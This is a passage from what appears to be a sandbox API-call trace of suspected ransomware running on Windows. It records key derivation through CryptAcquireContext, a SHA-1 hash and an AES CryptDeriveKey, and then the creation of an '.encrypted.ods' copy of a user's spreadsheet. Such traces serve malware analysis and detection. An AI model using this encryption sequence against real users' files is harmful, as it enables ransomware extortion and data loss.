nFileSizeHigh=0x0, nFileSizeLow=0x4911, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="BN3xfsXKP2npRmT.ods", cAlternateFileName="BN3XFS~1.ODS")) returned 0x7c2100 [0033.578] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0033.578] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.578] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.578] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.579] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.579] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0033.579] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.579] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0033.579] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.579] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0033.579] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.579] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.579] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.579] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.579] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.579] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0033.579] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.579] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0033.580] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.580] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.580] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0033.580] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.580] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.580] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.580] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.580] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.580] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.580] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.580] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0033.580] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0033.580] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.581] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0033.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.581] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0033.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0033.581] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.581] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0033.581] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.581] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.581] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.581] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.581] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.581] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.581] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0033.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.581] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.582] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.582] CryptHashData (hHash=0x7c2240, pbData=0x7c7778, dwDataLen=0x100, dwFlags=0x1) returned 1 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.582] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.582] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0033.582] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0033.582] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.582] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.582] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.583] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0033.583] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0033.583] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0033.583] CryptDestroyHash (hHash=0x7c2240) returned 1 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3a8 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b85a8 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889958 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da408 [0033.583] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3a8 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0033.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0033.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.583] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0033.583] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.583] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\bn3xfsxkp2nprmt.ods"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0033.584] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.584] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b20 | out: hHeap=0x770000) returned 1 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.584] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0033.584] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0033.584] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891f0 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3f8 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c7778 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8600 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c7778 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c778 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0033.585] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0033.585] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa0) returned 0x7d8558 [0033.585] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt")) returned 0x10 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8558 | out: hHeap=0x770000) returned 1 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d8600 | out: hHeap=0x770000) returned 1 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c898 | out: hHeap=0x770000) returned 1 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0033.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0033.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x89ffb8 [0033.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0033.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0033.586] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\BN3xfsXKP2npRmT.encrypted.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\bn3xfsxkp2nprmt.encrypted.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1968 [0033.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0033.586] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0033.586] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 